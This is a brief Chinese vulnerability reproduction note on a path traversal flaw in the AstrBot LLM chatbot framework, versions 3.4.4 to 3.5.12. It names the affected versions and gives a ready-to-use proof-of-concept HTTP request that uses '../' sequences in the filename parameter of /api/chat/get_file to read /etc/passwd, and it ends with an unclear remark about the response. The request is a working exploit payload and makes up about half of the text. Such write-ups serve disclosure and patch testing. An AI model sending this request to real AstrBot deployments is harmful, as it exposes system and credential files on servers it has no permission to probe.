0x01漏洞介绍
AstrBot是AstrBot开源的一个多平台 LLM 聊天机器人及开发框架。
AstrBot 3.4.4至3.5.12版本存在安全漏洞,该漏洞源于路径遍历缺陷,可能导致敏感信息泄露。
0x02影响版本
AstrBot 3.4.4至3.5.12版本
0x03漏洞复现
1.访问漏洞环境
2.对漏洞进行复现
POC
漏洞复现
GET /api/chat/get_file?filename=../../../../../../../etc/passwd HTTP/2
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close通过相应判断漏洞存在
没有回复内容